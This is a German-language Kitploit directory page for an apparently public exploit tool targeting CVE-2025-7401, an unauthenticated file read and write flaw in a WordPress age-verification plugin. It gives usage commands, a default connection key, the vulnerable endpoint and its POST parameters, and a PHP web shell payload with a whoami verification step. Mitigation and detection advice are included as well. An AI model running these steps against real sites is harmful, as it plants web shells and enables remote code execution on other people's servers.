Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/nxploited/cve-2025-7401
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubnxploited/cve-2025-7401

CVE-2025-7401

Premium Age Verification / Restriction for WordPress <= 3.0.2 - Nicht authentifiziertes beliebiges Lesen und Schreiben von Dateien

Repository anzeigen
21vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-7401

Premium Age Verification / Restriction for WordPress <= 3.0.2 - Nicht authentifiziertes beliebiges Lesen und Schreiben von Dateien

🧾 Premium Age Verification / Restriction for WordPress <= 3.0.2 — Nicht authentifiziertes beliebiges Lesen und Schreiben von Dateien

📝 Beschreibung

Das Plugin „Premium Age Verification / Restriction for WordPress" enthält einen unzureichend geschützten Remote-Support-Endpunkt in remote_tunnel.php. In betroffenen Versionen bis einschließlich 3.0.2 kann dieser Endpunkt für nicht authentifiziertes beliebiges Lesen und Schreiben von Dateien missbraucht werden. Eine erfolgreiche Ausnutzung kann vertrauliche Informationen offenlegen oder eine Remote-Codeausführung ermöglichen.

  • CVE: CVE-2025-7401
  • CVSS: 9.8 (Kritisch)

⚙️ Skriptübersicht

  • Skriptname: CVE-2025-7401.py
  • Zweck: Ein Testwerkzeug für autorisierte Sicherheitsexperten, um das Dateischreibverhalten im anfälligen Plugin-Endpunkt zu validieren. Das Skript normalisiert das Ziel, kodiert ein vom Benutzer bereitgestelltes PHP-Snippet, sendet eine POST-Anfrage an den anfälligen Endpunkt, um das Schreiben einer Datei zu versuchen, und überprüft optional den über das Web zugänglichen Dateipfad.

▶️ Schnelle Anwendungsbeispiele

root@kitploit:~
# Basic (uses default connection key and default PHP shell)
python CVE-2025-7401.py -u example.com

# Use HTTPS and custom connection key, skip verification
python CVE-2025-7401.py -u https://target.example -key YOUR_KEY --no-verify

# Custom PHP payload (authorized testing only)
python CVE-2025-7401.py -u target.com -shell '<?= system($_GET["cmd"]); ?>'

🧭 Befehlszeilenoptionen


📋 Detailliertes Skriptverhalten (Schritt für Schritt)


📌 Erwartete Ausgaben und ihre Bedeutung


🛡️ Gegenmaßnahmen & Empfehlungen

  • Aktualisieren Sie das Plugin sofort auf eine vom Hersteller bereitgestellte, gepatchte Version.
  • Beschränken Sie den Zugriff auf Remote-Support-Funktionen durch Authentifizierung und ordnungsgemäße Autorisierungsprüfungen.
  • Bereinigen und validieren Sie serverseitig alle vom Benutzer bereitgestellten Dateipfade und Dateiinhalte.
  • Wenden Sie strenge Dateisystemberechtigungen an, um zu verhindern, dass der Web-Benutzer ausführbare Dateien im Webroot erstellen kann.
  • Stellen Sie WAF-Regeln bereit, um verdächtige Anfragen an remote_tunnel.php zu erkennen und zu blockieren.

🔎 Erkennung & Forensik

  • Untersuchen Sie Webserver-Logs auf POST-Anfragen an /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php mit den Parametern: action=save_file, file, file_content.
  • Durchsuchen Sie das Plugin-Verzeichnis nach unerwarteten Dateien wie remote_init.php.
  • Achten Sie auf base64-kodierte Payloads in POST-Bodies.
  • Korrelieren Sie Zeitstempel von Dateiänderungen mit verdächtigen Anfragen.

🤝 Verantwortungsvolle Offenlegung

Wenn Sie diese Schwachstelle auf Infrastruktur Dritter entdecken:

  • Nutzen Sie Produktionssysteme NICHT aus und verändern Sie sie nicht.
  • Kontaktieren Sie den Website-Betreiber oder den Plugin-Hersteller privat und sicher.
  • Geben Sie dem Hersteller reproduzierbare Schritte weiter und gewähren Sie angemessene Zeit für die Behebung, bevor eine öffentliche Offenlegung erfolgt.

⚖️ Rechtlicher & Sicherheitshinweis

Die unbefugte Nutzung von Schwachstellen-Testwerkzeugen ist in vielen Rechtsordnungen illegal. Dieses Repository und Skript sind ausschließlich für defensive Forschung, autorisierte Tests und koordinierte Offenlegung von Schwachstellen bestimmt. Holen Sie immer eine ausdrückliche schriftliche Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören.


❗ Haftungsausschluss

Der Autor und die Mitwirkenden übernehmen keine Verantwortung für den Missbrauch der Informationen oder Werkzeuge. Verwenden Sie dieses Material nur innerhalb rechtlicher und ethischer Grenzen.


Von: Nxploited ( Khaled Alenazi )

Tool herunterladen
FlagTypStandardBeschreibung
-u, --urlstringerforderlichZieldomain oder Teil-URL. Das Skript hängt bei Bedarf den Plugin-Endpunkt an. Beispiele: example.com, https://example.com, example.com/wp-content/plugins/age-restriction/.
-key, --keystring330489965d8266a739442ef890f57805Verbindungsschlüssel, der vom Remote-Support-Endpunkt verwendet wird. Bei Bedarf für Laborziele überschreiben.
-shell, --shellstring<?= system($_GET["cmd"]); ?>PHP-Snippet, das als Dateiinhalt injiziert werden soll. Nur für autorisierte Tests ändern.
--no-verifyflagfalseFalls vorhanden, führt das Skript die optionale GET-Überprüfung der geschriebenen Datei nicht durch.
SchrittAktionDetails
1EingabenormalisierungNimmt Benutzereingaben (Domain oder Teilpfad) entgegen. Stellt das Schema sicher (http://, falls fehlend), entfernt doppelte Schrägstriche und hängt /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php an, falls der Endpunkt nicht vorhanden ist.
2Header-ErstellungErstellt realistische HTTP-Request-Header (rotierende User-Agent-Auswahl, Accept, Referer, Content-Type).
3Payload-KodierungKodiert das bereitgestellte PHP-Snippet base64 und platziert es in file_content.
4POST-Exploit-AnfrageSendet connection_key, action=save_file, file (Serverpfad) und file_content über application/x-www-form-urlencoded an den normalisierten remote_tunnel.php-Endpunkt.
5Antwort-ParsingVersucht, JSON aus dem Antwortkörper zu parsen. Wenn JSON vorhanden ist, werden status und file_path ausgegeben; andernfalls wird die bereinigte Rohantwort ausgegeben.
6Überprüfung (optional)Versucht einen GET auf /wp-content/plugins/age-restriction/modules/remote_support/remote_init.php?cmd=whoami, um zu prüfen, ob die injizierte Datei zugänglich ist und Inhalte zurückgibt. Optional über --no-verify.
7BerichterstattungGibt einen strukturierten, menschenlesbaren Bericht aus, einschließlich des verwendeten Endpunkts, des HTTP-Status, des geparsten JSON (falls vorhanden), der erwarteten Shell-URL und der gekürzten Überprüfungsausgabe (falls erfolgreich).
AusgabefeldBedeutungBeispiel
ZielendpunktEndgültige normalisierte kontaktierte URL (vollständiger Pfad zu remote_tunnel.php).http://example.com/wp-content/.../remote_tunnel.php
HTTP-StatuscodeHTTP-Antwortcode der POST-Anfrage. 200 deutet oft darauf hin, dass die Anfrage verarbeitet wurde.200
Antwort-JSON-statusWenn der Endpunkt JSON zurückgibt, meldet das Feld status Erfolg bzw. Fehlschlag.valid
Antwort-JSON-file_pathVom Endpunkt zurückgegebener serverseitiger Pfad, der anzeigt, wohin die Datei geschrieben wurde (informativ)./var/www/html/wp-content/.../remote_init.php
RohantwortNicht-JSON-Antwortkörper (bereinigt), z. B. PHP-Hinweise oder -Meldungen.Notice: ...
Shell-URL (erwartet)Die öffentliche URL, unter der die injizierte Datei erreichbar wäre. Nur für Überprüfungen in autorisierten Tests verwenden.http://example.com/wp-content/.../remote_init.php?cmd=whoami
HTTP-Status der ÜberprüfungHTTP-Status der optionalen GET-Überprüfung.200
Überprüfungstext (gekürzt)Die ersten N Zeichen des Antwortkörpers der Überprüfung (nützlich, um die Befehlsausgabe zu sehen).www-data